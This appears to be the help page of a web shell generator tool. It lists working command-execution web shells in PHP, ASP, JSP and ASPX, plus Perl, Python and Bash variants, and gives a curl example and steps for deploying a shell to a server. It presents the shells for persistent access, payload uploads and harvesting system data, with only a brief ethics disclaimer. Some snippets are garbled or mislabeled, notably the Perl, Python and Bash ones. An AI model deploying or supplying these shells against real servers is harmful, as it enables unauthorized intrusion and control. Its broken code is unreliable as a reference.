Web Shells are web-based scripts that allow a penetration tester to execute commands on a compromised web server. These scripts can be written in various languages, including PHP, ASP, JSP, and others. Web shells are commonly used in penetration testing to maintain access to a compromised server, conduct further enumeration, or execute system commands remotely.
Why Use Web Shells?
Web shells provide a convenient way to execute system commands on a remote server via a web interface. They allow for:
- Remote command execution on a compromised system.
- Enumeration of users, processes, and system information.
- Uploading additional tools for further testing and exploitation.
- Persistent access to a system for extended testing.
Available Web Shell Options
Our web shell generator allows you to select different scripting languages for shell execution. Each type of web shell has unique characteristics and use cases:
- PHP Web Shell
<?php echo shell_exec($_GET['cmd']); ?>
Use Case: PHP shells are widely used because PHP is a common web technology. They allow execution of system commands via HTTP parameters. - ASP Web Shell
<% Response.Write(CreateObject("WScript.Shell").Exec(Request("cmd")).StdOut.ReadAll()) %>
Use Case: Used in legacy Windows servers running ASP-based applications. - JSP Web Shell
<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream())); String s; while ((s = stdInput.readLine()) != null) { out.println(s); } %>
Use Case: Used in Java-based web applications running on Tomcat or similar servers. - ASPX Web Shell
<%@ Page Language="C#" %><script runat="server">protected void Page_Load(object sender, EventArgs e) { System.Diagnostics.Process.Start(Request["cmd"]); }</script>
Use Case: Targets Windows servers running ASP.NET applications. - Perl Web Shell
#!/usr/bin/perl use CGI; my $query = new CGI; print "Content-type: text/plain\n\n"; print \“$query->param(‘cmd’)”`;`
Use Case: Used in CGI-based applications and UNIX environments. - Python Web Shell
#!/usr/bin/python import os cmd = input() os.system(cmd)
Use Case: Useful for executing arbitrary Python code on a compromised server. - Bash Web Shell
#!/bin/bash $1
Use Case: Used in UNIX-based systems to execute shell commands.
Web Shell Use Cases
Web shells are commonly used in penetration testing for:
- Maintaining persistent access to a compromised server.
- Executing system commands remotely over HTTP.
- Uploading additional payloads for privilege escalation.
- Harvesting system information like user accounts, processes, and network connections.
Example Commands
Here are examples of how to execute commands using the various web shells:
- PHP Web Shell Example
To execute a command using the PHP web shell:> curl "http://target.com/shell.php?cmd=whoami"
After sending the request, the server will execute:> whoami - Python Web Shell Example
To execute a Python command:> echo "ls -la" | python -c "import os; os.system(input())"
Generating Web Shells
To create a web shell:
- Select the desired scripting language (PHP, ASP, JSP, etc.).
- Customize your command structure through the form (e.g., set the execution method or provide custom commands).
- Generate the web shell and copy the command.
- Deploy the web shell to a server with write access.
- Execute commands by sending requests to the shell.
Ethical and Legal Considerations
⚠️ Web shells should only be used in ethical hacking scenarios where explicit permission has been granted. Unauthorized use of web shells can lead to legal consequences. Always follow responsible disclosure practices when identifying security vulnerabilities.
Additional Notes:
Command Execution Methods: For PHP web shells, you can choose the method of command execution (e.g., shell_exec, eval, system), further tailoring the web shell to specific needs.
Custom Commands: The form supports custom command inputs, allowing you to specify any desired execution logic (e.g., PHP methods, custom query parameters) for more flexible testing scenarios.